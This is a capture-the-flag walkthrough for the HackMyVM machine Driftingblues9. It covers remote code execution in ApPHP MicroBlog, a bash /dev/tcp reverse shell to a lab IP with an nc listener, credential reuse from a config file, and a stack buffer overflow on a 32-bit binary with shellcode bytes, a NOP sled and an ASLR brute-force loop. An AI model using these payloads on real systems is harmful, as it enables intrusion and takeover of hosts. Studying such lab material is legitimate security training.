Machine can be download here: https://hackmyvm.eu/machines/machine.php?vm=Driftingblues9
Nmap scan ports first, port 80 is open.
Open port 80 in browser, it's a tiny blog.
Check source code, we see the app name and version.
<!-- This script was generated by ApPHP MicroBlog v.1.0.1 (http://www.apphp.com/php-microblog/) -->
Search exploitdb for poc, use the RCE one.
Run nc -nlvp 1234
to listen to port 1234 at one terminal, and run the poc in another terminal, input code : /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'
. Then we get reverse shell.
Next we need to be clabton. We found credentials in/var/www/html/include/base.inc.php.
We use python to spawn a term, and then su to user clapton.
The last step is to pwn the input in /home/clapton.
Download input file, check the type and security settings of the elf. (Checksec is a tool of pwntools.)
It's a 32 bit elf, and with no protection, which means we can make shellcode running on stack. That is good.
Use your favorite disassembler to check the file. It only has a simple strcpy, which is vulnerable, but with no other instructions can be used.
int __cdecl main(int argc, const char **argv, const char **envp) { char dest[159]; // [esp+11h] [ebp-9Fh] BYREF if ( argc <= 1 ) { printf("Syntax: %s <input string>\n", *argv); exit(0); } strcpy(dest, argv[1]); return 0; }{ char dest[159]; // [esp+11h] [ebp-9Fh] BYREF if ( argc <= 1 ) { printf("Syntax: %s <input string>\n", *argv); exit(0); } strcpy(dest, argv[1]); return 0; }
When we input a long string, it will crash. So we need to get the padding length of the strings, that can make return address just be overflowed.
We use gdb-peda, create pattern, find crash address, locate the offset.
If you don't use peda, you can use pattern_create.rb and pattern_offset.rb in /usr/share/metasploit-framework/tools/exploit/.
Because the VM has gdb too, so we can run gdb to test if our calculation is correct. 0x62626262 is 'bbbb', which means our length calculation is correct, the return address is modified to 'bbbb'.
But if we run the app several time, we will found that when app crashed, the esp address is different. But we know the address range is about 0xbf??????.
That's because ASLR is enabled on the VM.
Our method is to add a long nop
s, so maybe eip will hit in our shellcode.
We use a classic shellcode:"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
Also, we can generate shellcode through pwntools or msfvenom.
For pwntools, the code is:
python3 -c "from pwn import *;context(log_level='debug',arch='i386',os='linux');shellcode=asm(shellcraft.sh());print(shellcode)"
And we add a loop to run the app multiple times. The key to success pwn a shell, is to make a long enough NOPS, at set a appropriate return address. Here I set nops length 0x10000, return address base 0xbf901010.
for a in {1..1000}; do echo -n $a; ./input $(python -c 'print "A" * 171 + "\x10\x10\x90\xbf" + "\x90" * 0x10000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"');done
Here is a great tut about the pwn.
https://blog.geoda-security.com/2017/02/lord-of-r00t-walkthrough.html